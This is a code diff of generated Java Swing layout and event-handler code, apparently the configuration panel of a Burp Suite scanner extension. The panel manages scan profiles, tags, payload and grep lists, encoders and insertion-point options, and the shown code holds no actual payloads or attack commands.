+ button1setProfileEnable(evt);
+ }
+ });
+
+ button12.setText("Disable");
+ button12.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ button12SetDisableProfiles(evt);
+ }
+ });
+
+ button13.setText("Remove");
+ button13.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ button13DeleteItem(evt);
+ }
+ });
+
+ jButton4.setText("Enable All");
+ jButton4.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ enableAll(evt);
+ }
+ });
+
+ jButton10.setText("Disable All");
+ jButton10.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ disableAll(evt);
+ }
+ });
+
+ javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2);
+ jPanel2.setLayout(jPanel2Layout);
+ jPanel2Layout.setHorizontalGroup(
+ jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel2Layout.createSequentialGroup()
+ .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel2Layout.createSequentialGroup()
+ .addGap(249, 249, 249)
+ .addComponent(jLabel45)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(newTagCombo2, javax.swing.GroupLayout.PREFERRED_SIZE, 325, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGroup(jPanel2Layout.createSequentialGroup()
+ .addGap(25, 25, 25)
+ .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel2Layout.createSequentialGroup()
+ .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)
+ .addComponent(button12, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(jButton4, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
+ .addComponent(jButton10, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
+ .addComponent(button1, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(button13, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ .addGap(18, 18, 18)
+ .addComponent(jtabpane, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addComponent(jLabel44, javax.swing.GroupLayout.PREFERRED_SIZE, 575, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel43))))
+ .addContainerGap(133, Short.MAX_VALUE))
+ );
+
+ jPanel2Layout.linkSize(javax.swing.SwingConstants.HORIZONTAL, new java.awt.Component[] {button1, button12, button13, jButton10, jButton4});
+
+ jPanel2Layout.setVerticalGroup(
+ jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel2Layout.createSequentialGroup()
+ .addGap(14, 14, 14)
+ .addComponent(jLabel43)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jLabel44)
+ .addGap(36, 36, 36)
+ .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(newTagCombo2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel45))
+ .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel2Layout.createSequentialGroup()
+ .addGap(52, 52, 52)
+ .addComponent(button1)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(button12)
+ .addGap(18, 18, 18)
+ .addComponent(jButton4)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jButton10)
+ .addGap(18, 18, 18)
+ .addComponent(button13))
+ .addGroup(jPanel2Layout.createSequentialGroup()
+ .addGap(18, 18, 18)
+ .addComponent(jtabpane, javax.swing.GroupLayout.PREFERRED_SIZE, 543, javax.swing.GroupLayout.PREFERRED_SIZE)))
+ .addContainerGap(858, Short.MAX_VALUE))
+ );
+
+ jTabbedPane2.addTab(" Profiles Manager ", jPanel2);
+
+ jLabel48.setText("In this section you can manage the tags. You can delete tags, add, etc ");
+
+ jLabel49.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel49.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel49.setText("Tags Manager");
+
+ jButton11.setText("New");
+ jButton11.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ newTagManager(evt);
+ }
+ });
+
+ jButton12.setText("Remove");
+ jButton12.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ removeTagManager(evt);
+ }
+ });
+
+ jButton13.setText("Delete tag for all profiles");
+ jButton13.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ deleteTagmanager(evt);
+ }
+ });
+
+ listtagmanager.setModel(tagmanager);
+ jScrollPane13.setViewportView(listtagmanager);
+
+ javax.swing.GroupLayout jPanel4Layout = new javax.swing.GroupLayout(jPanel4);
+ jPanel4.setLayout(jPanel4Layout);
+ jPanel4Layout.setHorizontalGroup(
+ jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel4Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel48, javax.swing.GroupLayout.PREFERRED_SIZE, 575, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel49)
+ .addGroup(jPanel4Layout.createSequentialGroup()
+ .addGroup(jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)
+ .addComponent(jButton11)
+ .addComponent(jButton12))
+ .addGap(18, 18, 18)
+ .addComponent(jScrollPane13, javax.swing.GroupLayout.PREFERRED_SIZE, 333, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jButton13)))
+ .addContainerGap(314, Short.MAX_VALUE))
+ );
+
+ jPanel4Layout.linkSize(javax.swing.SwingConstants.HORIZONTAL, new java.awt.Component[] {jButton11, jButton12});
+
+ jPanel4Layout.setVerticalGroup(
+ jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel4Layout.createSequentialGroup()
+ .addContainerGap()
+ .addComponent(jLabel49)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jLabel48)
+ .addGap(36, 36, 36)
+ .addGroup(jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel4Layout.createSequentialGroup()
+ .addComponent(jButton11)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jButton12))
+ .addComponent(jButton13)
+ .addComponent(jScrollPane13, javax.swing.GroupLayout.PREFERRED_SIZE, 296, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addContainerGap(1158, Short.MAX_VALUE))
+ );
+
+ jTabbedPane2.addTab(" Tags Manager ", jPanel4);
+
+ javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this);
+ this.setLayout(layout);
+ layout.setHorizontalGroup(
+ layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jTabbedPane2)
+ .addGroup(layout.createSequentialGroup()
+ .addGap(92, 92, 92)
+ .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 127, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jButton5, javax.swing.GroupLayout.PREFERRED_SIZE, 146, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(text11, javax.swing.GroupLayout.PREFERRED_SIZE, 440, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(0, 0, Short.MAX_VALUE)))
+ .addContainerGap())
+ );
+ layout.setVerticalGroup(
+ layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(layout.createSequentialGroup()
+ .addGap(18, 18, Short.MAX_VALUE)
+ .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(jButton5)
+ .addComponent(text11, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jButton1))
+ .addGap(48, 48, 48)
+ .addComponent(jTabbedPane2, javax.swing.GroupLayout.PREFERRED_SIZE, 1581, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addContainerGap())
+ );
+ }// //GEN-END:initComponents
+
+ private void selectAttack(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_selectAttack
+ if ((evt.getStateChange() == java.awt.event.ItemEvent.SELECTED)) {
+ String name = combo1.getItemAt(combo1.getSelectedIndex());
+ setAttackValues(name);
+ }
+ }//GEN-LAST:event_selectAttack
+
+ private void saveAttack(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_saveAttack
+ saveAttackValues();
+ initCombo();
+ }//GEN-LAST:event_saveAttack
+
+ private void loadConfigFile(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_loadConfigFile
+ loadConfigFile();
+ makeTagsFile();
+ showTags();
+ }//GEN-LAST:event_loadConfigFile
+
+ private void profilesReload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_profilesReload
+ initCombo();
+ makeTagsFile();
+ showTags();
+ }//GEN-LAST:event_profilesReload
+
+ private void jButton3ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton3ActionPerformed
+ clear();
+ }//GEN-LAST:event_jButton3ActionPerformed
+
+ private void SelectPassiveResponse(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_SelectPassiveResponse
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ headerstab.setSelectedIndex(1);
+ headerstab.setEnabledAt(0, false);
+ radio12.setEnabled(false);
+ radio22.setEnabled(false);
+ radiotime.setEnabled(false);
+ texttime.setEnabled(false);
+ jLabel16.setEnabled(false);
+ texttime.setEnabled(false);
+ check71.setEnabled(true);
+ check72.setEnabled(true);
+ text71.setEnabled(true);
+ text72.setEnabled(true);
+ negativeCT.setEnabled(true);
+ negativeRC.setEnabled(true);
+ rb1.setEnabled(false);
+ rb2.setEnabled(false);
+ rb3.setEnabled(false);
+ rb4.setEnabled(false);
+ jLabel6.setEnabled(false);
+ jLabel2.setEnabled(false);
+ sp1.setEnabled(false);
+ jLabel28.setEnabled(false);
+ jLabel29.setEnabled(false);
+ radiocl.setEnabled(false);
+ textcl.setEnabled(false);
+ jLabel42.setEnabled(false);
+ variationsRadio.setEnabled(false);
+ invariationsRadio.setEnabled(false);
+ setEnabledVariations(false);
+ }
+ }//GEN-LAST:event_SelectPassiveResponse
+
+ private void selectActive(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_selectActive
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ headerstab.setEnabledAt(0, true);
+ radio12.setEnabled(true);
+ radio22.setEnabled(true);
+ radiotime.setEnabled(true);
+ texttime.setEnabled(true);
+ jLabel16.setEnabled(true);
+ check71.setEnabled(true);
+ check72.setEnabled(true);
+ text71.setEnabled(true);
+ text72.setEnabled(true);
+ negativeCT.setEnabled(true);
+ negativeRC.setEnabled(true);
+ rb1.setEnabled(true);
+ rb2.setEnabled(true);
+ rb3.setEnabled(true);
+ rb4.setEnabled(true);
+ jLabel6.setEnabled(true);
+ jLabel2.setEnabled(true);
+ sp1.setEnabled(true);
+ jLabel28.setEnabled(true);
+ jLabel29.setEnabled(true);
+ radiocl.setEnabled(true);
+ textcl.setEnabled(true);
+ jLabel42.setEnabled(true);
+ variationsRadio.setEnabled(true);
+ invariationsRadio.setEnabled(true);
+ if (variationsRadio.isSelected() || invariationsRadio.isSelected()) {
+ setEnabledVariations(true);
+ }
+
+ }
+ }//GEN-LAST:event_selectActive
+
+ private void selectPassiveRequest(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_selectPassiveRequest
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ headerstab.setSelectedIndex(1);
+ headerstab.setEnabledAt(0, false);
+ radio12.setEnabled(false);
+ radio22.setEnabled(false);
+ radiotime.setEnabled(false);
+ texttime.setEnabled(false);
+ jLabel16.setEnabled(false);
+ check71.setEnabled(false);
+ check72.setEnabled(false);
+ text71.setEnabled(false);
+ text72.setEnabled(false);
+ negativeCT.setEnabled(false);
+ negativeRC.setEnabled(false);
+ rb1.setEnabled(false);
+ rb2.setEnabled(false);
+ rb3.setEnabled(false);
+ rb4.setEnabled(false);
+ jLabel6.setEnabled(false);
+ jLabel2.setEnabled(false);
+ sp1.setEnabled(false);
+ jLabel28.setEnabled(false);
+ jLabel29.setEnabled(false);
+ radiocl.setEnabled(false);
+ textcl.setEnabled(false);
+ jLabel42.setEnabled(false);
+ variationsRadio.setEnabled(false);
+ invariationsRadio.setEnabled(false);
+ setEnabledVariations(false);
+ }
+ }//GEN-LAST:event_selectPassiveRequest
+
+ private void newTagCombo2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_newTagCombo2ActionPerformed
+ // TODO add your handling code here:
+ }//GEN-LAST:event_newTagCombo2ActionPerformed
+
+ private void button1setProfileEnable(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button1setProfileEnable
+ int activePane = jtabpane.getSelectedIndex();
+
+ if (activePane == 0) {
+ setEnableDisableProfile("Yes", 0);
+ } else if (activePane == 1) {
+ setEnableDisableProfile("Yes", 1);
+ } else if (activePane == 2) {
+ setEnableDisableProfile("Yes", 2);
+ }
+ initCombo();
+
+ }//GEN-LAST:event_button1setProfileEnable
+
+ private void button12SetDisableProfiles(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button12SetDisableProfiles
+ int activePane = jtabpane.getSelectedIndex();
+
+ if (activePane == 0) {
+ setEnableDisableProfile("No", 0);
+ } else if (activePane == 1) {
+ setEnableDisableProfile("No", 1);
+ } else if (activePane == 2) {
+ setEnableDisableProfile("No", 2);
+ }
+ initCombo();
+ }//GEN-LAST:event_button12SetDisableProfiles
+
+ private void button13DeleteItem(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_button13DeleteItem
+ int activePane = jtabpane.getSelectedIndex();
+
+ if (activePane == 0) {
+ deleteProfile(0);
+ } else if (activePane == 1) {
+ deleteProfile(1);
+ } else if (activePane == 2) {
+ deleteProfile(2);
+ }
+ initCombo();
+ }//GEN-LAST:event_button13DeleteItem
+
+ private void showprofiles(javax.swing.event.ChangeEvent evt) {//GEN-FIRST:event_showprofiles
+ if (jTabbedPane2.isShowing()) {
+ showProfiles("All");
+ showTags();
+ }
+ }//GEN-LAST:event_showprofiles
+
+ private void enableAll(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_enableAll
+ setEnableDisableAllProfiles("Yes");
+ initCombo();
+ }//GEN-LAST:event_enableAll
+
+ private void selectTag(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_selectTag
+ if ((evt.getStateChange() == java.awt.event.ItemEvent.SELECTED)) {
+ String name = newTagCombo2.getItemAt(newTagCombo2.getSelectedIndex());
+ showProfiles(name);
+ }
+ }//GEN-LAST:event_selectTag
+
+ private void disableAll(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_disableAll
+ setEnableDisableAllProfiles("No");
+ initCombo();
+ }//GEN-LAST:event_disableAll
+
+ private void newTagManager(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_newTagManager
+ NewTag nt = new NewTag();
+ int result = JOptionPane.showOptionDialog(this, nt, "New Tag", JOptionPane.OK_CANCEL_OPTION, JOptionPane.PLAIN_MESSAGE, null, null, null);
+ if (result == JOptionPane.OK_OPTION) {
+ String newTag = nt.newTagtext.getText();
+ addNewTag(newTag);
+ showTags();
+ }
+ }//GEN-LAST:event_newTagManager
+
+ private void removeTagManager(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removeTagManager
+ int selectedIndex = listtagmanager.getSelectedIndex();
+ String tag = "";
+ if (selectedIndex != -1) {
+ tag = tagmanager.get(selectedIndex).toString();
+ tagmanager.remove(selectedIndex);
+ }
+ removeTag(tag);
+ showTags();
+ }//GEN-LAST:event_removeTagManager
+
+ private void deleteTagmanager(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_deleteTagmanager
+ int selectedIndex = listtagmanager.getSelectedIndex();
+ String tag = "";
+ if (selectedIndex != -1) {
+ tag = tagmanager.get(selectedIndex).toString();
+ tagmanager.remove(selectedIndex);
+ }
+ deleteTagProfiles(tag);
+ removeTag(tag);
+ showTags();
+ }//GEN-LAST:event_deleteTagmanager
+
+ private void headerstabStateChanged(javax.swing.event.ChangeEvent evt) {//GEN-FIRST:event_headerstabStateChanged
+ int activePane = headerstab.getSelectedIndex();
+ if (activePane == 3) {
+ showTags();
+ }
+ }//GEN-LAST:event_headerstabStateChanged
+
+ private void newTag(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_newTag
+ NewTag nt = new NewTag();
+ int result = JOptionPane.showOptionDialog(this, nt, "New Tag", JOptionPane.OK_CANCEL_OPTION, JOptionPane.PLAIN_MESSAGE, null, null, null);
+ if (result == JOptionPane.OK_OPTION) {
+ String newTag = nt.newTagtext.getText();
+ addNewTag(newTag);
+ showTags();
+ }
+ }//GEN-LAST:event_newTag
+
+ private void addTag(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_addTag
+ tag.addElement(newTagCombo.getSelectedItem());
+ }//GEN-LAST:event_addTag
+
+ private void removetag(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removetag
+ int selectedIndex = listtag.getSelectedIndex();
+ if (selectedIndex != -1) {
+ tag.remove(selectedIndex);
+ }
+ }//GEN-LAST:event_removetag
+
+ private void radioclActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_radioclActionPerformed
+ // TODO add your handling code here:
+ }//GEN-LAST:event_radioclActionPerformed
+
+ private void radioclSelect(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_radioclSelect
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVariations(false);
+ setEnabledVarious(false);
+ } else if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) {
+ setEnabledVarious(true);
+ setEnabledVariations(true);
+ }
+ }//GEN-LAST:event_radioclSelect
+
+ private void TimeoutSelect(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_TimeoutSelect
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVarious(false);
+ setEnabledVariations(false);
+ } else if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) {
+ setEnabledVarious(true);
+ setEnabledVariations(true);
+ }
+ }//GEN-LAST:event_TimeoutSelect
+
+ private void pasteGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_pasteGrep
+ String element = getClipboardContents();
+ String[] lines = element.split("\n");
+ for (String line : lines) {
+ grep.addElement(line);
+ }
+ }//GEN-LAST:event_pasteGrep
+
+ private void setToGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_setToGrep
+ if (!textfield2.getText().isEmpty()){
+ grep.addElement(textfield2.getText());
+ textfield2.setText("");
+ }
+
+ }//GEN-LAST:event_setToGrep
+
+ private void removeAllGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removeAllGrep
+ grep.removeAllElements();
+ }//GEN-LAST:event_removeAllGrep
+
+ private void removeGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removeGrep
+ int selectedIndex = list2.getSelectedIndex();
+ if (selectedIndex != -1) {
+ grep.remove(selectedIndex);
+ }
+ }//GEN-LAST:event_removeGrep
+
+ private void loadGrep(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_loadGrep
+ loadGrepsFile(grep);
+ }//GEN-LAST:event_loadGrep
+
+ private void addMatchReplace(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_addMatchReplace
+ model4.addRow(new Object[]{"Payload", "Leave blank to add a new header", "Leave blank to remove a matched header", "String", "Generic comment"});
+ }//GEN-LAST:event_addMatchReplace
+
+ private void jButton6addEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton6addEncoder
+ if (!encoder.isEmpty() && encoder.firstElement().equals(" ")) {
+ encoder.removeElementAt(0);
+ encoder.addElement(combo2.getSelectedItem().toString());
+ } else {
+ encoder.addElement(combo2.getSelectedItem().toString());
+ }
+ }//GEN-LAST:event_jButton6addEncoder
+
+ private void jButton7downEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton7downEncoder
+ int selectedIndex = list3.getSelectedIndex();
+ if (selectedIndex != encoder.getSize() - 1) {
+ swap(selectedIndex, selectedIndex + 1);
+ list3.setSelectedIndex(selectedIndex + 1);
+ list3.ensureIndexIsVisible(selectedIndex + 1);
+
+ }
+ }//GEN-LAST:event_jButton7downEncoder
+
+ private void jButton8upEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton8upEncoder
+ int selectedIndex = list3.getSelectedIndex();
+ if (selectedIndex != 0) {
+ swap(selectedIndex, selectedIndex - 1);
+ list3.setSelectedIndex(selectedIndex - 1);
+ list3.ensureIndexIsVisible(selectedIndex - 1);
+
+ }
+ }//GEN-LAST:event_jButton8upEncoder
+
+ private void jButton9removeEncoder(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton9removeEncoder
+ int selectedIndex = list3.getSelectedIndex();
+ if (selectedIndex != -1) {
+ encoder.remove(selectedIndex);
+ }
+ }//GEN-LAST:event_jButton9removeEncoder
+
+ private void setToPayload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_setToPayload
+ if (!textfield1.getText().isEmpty()){
+ payload.addElement(textfield1.getText());
+ textfield1.setText("");
+ }
+
+ }//GEN-LAST:event_setToPayload
+
+ private void removeAllPayloads(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removeAllPayloads
+ payload.removeAllElements();
+ }//GEN-LAST:event_removeAllPayloads
+
+ private void removePayload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removePayload
+ int selectedIndex = list1.getSelectedIndex();
+ if (selectedIndex != -1) {
+ payload.remove(selectedIndex);
+ }
+ }//GEN-LAST:event_removePayload
+
+ private void loadPayloads(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_loadPayloads
+ loadPayloadsFile(payload);
+ }//GEN-LAST:event_loadPayloads
+
+ private void pastePayload(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_pastePayload
+
+ String element = getClipboardContents();
+ String[] lines = element.split("\n");
+ for (String line : lines) {
+ payload.addElement(line);
+ }
+ }//GEN-LAST:event_pastePayload
+
+ private void removeMatchReplace(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_removeMatchReplace
+ int[] rows = table4.getSelectedRows();
+ Arrays.sort(rows);
+ for (int i = rows.length - 1; i >= 0; i--) {
+ int row = rows[i];
+ int modelRow = table4.convertRowIndexToModel(row);
+ model4.removeRow(modelRow);
+ }
+ }//GEN-LAST:event_removeMatchReplace
+
+ private void variations(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_variations
+ if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) {
+ setEnabledVarious(true);
+ setEnabledVariations(false);
+ } else if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVarious(false);
+ setEnabledVariations(true);
+ }
+ }//GEN-LAST:event_variations
+
+ private void invariations(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_invariations
+ if (evt.getStateChange() == java.awt.event.ItemEvent.DESELECTED) {
+ setEnabledVarious(true);
+ setEnabledVariations(false);
+ } else if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVarious(false);
+ setEnabledVariations(true);
+ }
+ }//GEN-LAST:event_invariations
+
+ private void stringMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_stringMatchType
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVariations(false);
+ }
+ }//GEN-LAST:event_stringMatchType
+
+ private void regexMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_regexMatchType
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVariations(false);
+ }
+ }//GEN-LAST:event_regexMatchType
+
+ private void payloadMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_payloadMatchType
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVariations(false);
+ }
+ }//GEN-LAST:event_payloadMatchType
+
+ private void payloadencodeMatchType(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_payloadencodeMatchType
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ setEnabledVariations(false);
+ }
+ }//GEN-LAST:event_payloadencodeMatchType
+
+ private void paramxmlActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_paramxmlActionPerformed
+ // TODO add your handling code here:
+ }//GEN-LAST:event_paramxmlActionPerformed
+
+ private void AllItemStateChanged(java.awt.event.ItemEvent evt) {//GEN-FIRST:event_AllItemStateChanged
+ if (evt.getStateChange() == java.awt.event.ItemEvent.SELECTED) {
+ extensionprovided.setSelected(true);
+ header.setSelected(true);
+ entirebody.setSelected(true);
+ paramamf.setSelected(true);
+ parambody.setSelected(true);
+ paramcookie.setSelected(true);
+ paramjson.setSelected(true);
+ urlpathfolder.setSelected(true);
+ parammultipartattr.setSelected(true);
+ paramnamebody.setSelected(true);
+ paramnameurl.setSelected(true);
+ userprovided.setSelected(true);
+ paramurl.setSelected(true);
+ paramxml.setSelected(true);
+ paramxmlattr.setSelected(true);
+ urlpathfilename.setSelected(true);
+ unknown.setSelected(true);
+ } else {
+ extensionprovided.setSelected(false);
+ header.setSelected(false);
+ entirebody.setSelected(false);
+ paramamf.setSelected(false);
+ parambody.setSelected(false);
+ paramcookie.setSelected(false);
+ paramjson.setSelected(false);
+ urlpathfolder.setSelected(false);
+ parammultipartattr.setSelected(false);
+ paramnamebody.setSelected(false);
+ paramnameurl.setSelected(false);
+ userprovided.setSelected(false);
+ paramurl.setSelected(false);
+ paramxml.setSelected(false);
+ paramxmlattr.setSelected(false);
+ urlpathfilename.setSelected(false);
+ unknown.setSelected(false);
+ }
+
+ }//GEN-LAST:event_AllItemStateChanged
+
+ private void goWeb(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_goWeb
+ try {
+ Desktop.getDesktop().browse(new URI("https://portswigger.net/burp/extender/api/burp/IScannerInsertionPoint.html"));
+ } catch (URISyntaxException | IOException e){
+ System.out.println("Help web not opened: "+e);
+ }
+ }//GEN-LAST:event_goWeb
+
+
+ // Variables declaration - do not modify//GEN-BEGIN:variables
+ private javax.swing.JCheckBox All;
+ private javax.swing.JPanel Attributes;
+ private javax.swing.JButton addTag;
+ private javax.swing.JCheckBox anchor_labels;
+ private javax.swing.JRadioButton append;
+ private javax.swing.JButton button1;
+ private javax.swing.JButton button10;
+ private javax.swing.JButton button11;
+ private javax.swing.JButton button12;
+ private javax.swing.JButton button13;
+ private javax.swing.JButton button18;
+ private javax.swing.JButton button19;
+ private javax.swing.JButton button2;
+ private javax.swing.JButton button3;
+ private javax.swing.JButton button4;
+ private javax.swing.JButton button5;
+ private javax.swing.JButton button6;
+ private javax.swing.JButton button7;
+ private javax.swing.JButton button8;
+ private javax.swing.JButton button9;
+ private javax.swing.ButtonGroup buttonGroup1;
+ private javax.swing.ButtonGroup buttonGroup2;
+ private javax.swing.ButtonGroup buttonGroup3;
+ private javax.swing.ButtonGroup buttonGroup4;
+ private javax.swing.ButtonGroup buttonGroup5;
+ private javax.swing.ButtonGroup buttonGroup6;
+ private javax.swing.ButtonGroup buttonGroup7;
+ private javax.swing.ButtonGroup buttonGroup8;
+ private javax.swing.ButtonGroup buttonGroup9;
+ private javax.swing.JCheckBox button_submit_labels;
+ private javax.swing.JCheckBox canonical_link;
+ private javax.swing.JCheckBox check1;
+ private javax.swing.JCheckBox check4;
+ private javax.swing.JCheckBox check71;
+ private javax.swing.JCheckBox check72;
+ public javax.swing.JCheckBox check8;
+ public javax.swing.JComboBox combo1;
+ private javax.swing.JComboBox combo2;
+ private javax.swing.JCheckBox comments;
+ private javax.swing.JCheckBox content_length;
+ private javax.swing.JCheckBox content_location;
+ private javax.swing.JCheckBox content_type;
+ private javax.swing.JCheckBox css_classes;
+ private javax.swing.JCheckBox div_ids;
+ private javax.swing.JCheckBox entirebody;
+ private javax.swing.JCheckBox etag_header;
+ private javax.swing.JCheckBox excludehttp;
+ private javax.swing.JCheckBox extensionprovided;
+ private javax.swing.JCheckBox first_header_tag;
+ private javax.swing.JCheckBox header;
